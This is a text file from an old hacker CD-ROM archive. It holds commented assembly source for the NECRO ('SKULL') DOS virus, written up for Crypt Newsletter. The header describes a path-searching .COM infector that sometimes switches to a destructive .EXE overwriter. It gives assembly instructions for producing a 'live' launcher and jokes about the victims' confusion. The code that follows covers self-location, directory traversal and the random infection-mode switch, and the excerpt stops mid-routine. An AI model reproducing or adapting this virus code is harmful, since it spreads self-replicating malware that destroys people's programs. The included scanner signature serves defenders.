home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
NECRO.A86
< prev
next >
Wrap
Text File
|
1993-01-04
|
22KB
|
396 lines
; A86 SOURCE CODE for:
;
; ++===================================================++
; || NECRO (A.K.A. 'SKULL' virus) ||
; || The 666 byte Dual Replicator ||
; || DEC 1992 by Primal Fury, Lehigh Valley, PA ||
; ++===================================================++
; -=Prepared for Crypt Newsletter 11=-
;
; Here's a virus that's actually two viruses in one. The main virus is a
; a direct action, appending .COM infector. It will search the system path
; for .COMs to infect, and may infect files on the path in preference to
; to those in the current directory (if no path is set, it stays in the
; current directory). Roughly one out of every eight infections (on a ran-
; dom basis) will be non-standard. In these infections, NECRO will toggle to
; an overwriting .EXE infector.
;
;
; This .EXE infector is composed of much of the same code as the
; COM infector -- the virus alternates between the two modes of infection
; using a 'master switch' which is hooked up to a simple randomization
; engine. The master switch, when thrown, trips a series of auxilliary
; switches which alter the virus' behavior. This saves on bytes and is
; therefore much better than having the virus drop an entirely independent
; .EXE overwriter. I hope to expand upon this 'self-programming' concept
; in future viruses.
; Infected .COM's should function as intended after the viral code appended to
; them has finished doing its thing. But infected .EXE's are ruined. These
; (provided they are under about 64K in length) will, when executed, pass
; their illness on to the next uninfected .EXE within the current directory,
; displaying the following graphic & message:
; ▄▄████████▄▄
; ▄█████▓████████
;▐█▓█████████████▌ You cant execute this file:
;▐█████▓▓███▀ █ Its already dead!
; ██████▓▓██▄▄▄█▀
; ████▓▓▀▓████▌
; ▀▀██▓▓▄▐▓███▌
; ▓▓▌▌▌
; SKULL will then return the baffled user to the DOS prompt. I leave it to
; your imagination to picture the consternation on the novice's face
; as he tries to isolate the source of this overwriting infection which
; seems to pop up again and again in different directories. A very
; observant user may notice a file length increase of exactly 666 bytes in
; infected .COM's. Infected .EXE's will not increase in length unless they
; are less than ~200 bytes to begin with. Note that overwritten .EXE's larger
; than 64K will fail to load and will be non-infectious. Like Popoolar
; Science, the virus renders these programs into a .COM-like in structure.
; DOS will NOT execute these files. In any case, the programs are ruined
; by SKULL. As of this release, NECRO avoids files that are read-only or
; hidden, so these files are be safe from the virus (for now...)
; CREDITS: DARK ANGEL -- for his COM infector replicatory code. (D.A.)
; NOWHERE MAN -- for his VCL 1.0's path-searching routine. (N.M.)
;
;
; Except where noted, I have commented the code with the novice
; programmer in mind. In the places so noted, D.A.'s and N.M.'s com-
; ments, supplied from VCL 1.0 and PS-MPC assembly libraries, have been
; left intact.
; To assemble, use Isaacson's A86 to generate a .COMfile directly from
; this listing. You will have a live NECRO launcher. MASM/TASM
; compatible assemblers will require the addition of a declarative pair.
;
; Partial viral signature suitable for loading into TBScan's VIRSCAN.DAT,
; SCAN, or F-PROT 2.0x:
; [Necro]
; A9 01 00 74 29 E8 6A 00 8C C8 8E D8 8E C0 32 C0
Start: db 0e9h ; jump to find_start
dw 0
Find_start: call next ;common technique to allow virus to
next: pop bp ;find its own code. On exit, bp
sub bp, offset next ;points to start of code.
lea si, [bp+offset stuff] ;Prepare to restore orig. 3 bytes.
mov di, 100h ;push 100h, where all COMs start in
push di ;memory, & where control will be
;returned to host file.
movsw ;restore the 3 bytes formerly relo-
movsb ;cated by the virus upon infection.
mov di,bp ;point DI to start of virus.
lea dx, [bp+offset dta] ;set new Disk Transfer Address, so
call set_dta ;virus won't fuck up original.
call search_files ;call path-search/infection routine.
jmp quit ;when done, return control to
;host file.
;Nowhere Man's VCL 1.0 path search routine, slightly modified for
;compatibility with Dark Angel's code, and with 'master infection-mode
;switch' added. N.M.'s original comments have been retained for your
;enlightenment.
search_files:
mov bx,di ; BX points to the virus
push bp ; Save BP
mov byte ptr [bp+offset pathstore],'\' ;Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp+offset pathstore+1] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop:
cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
mov ah,03Bh ; DOS change directory function
lea dx,[bp+offset pathstore+65] ; DX points to the directory
int 021h
;The Master Switch, tied whimsically to the system clock:
mov ah,2ch ;DOS get system time.
int 21h ;
cmp dl,13 ;is 1/100th second > 13?
jg call_infector ;if so, stay in COM infector
;mode (the default).
mov si,3 ;throw switch for EXE infect.
;back to Nowhere Man's code:
call_infector:
push di
call find_files ; Try to infect a file.
pop di
jnc done_searching ; If successful, exit
jmp short traversal_loop ; Keep checking the PATH
done_searching:
mov ah,03Bh ; DOS change directory function
lea dx,[bp+offset pathstore] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not, exit
stc ; Set carry flag for failure
at_least_tried:
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
traverse_path:
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset
find_pa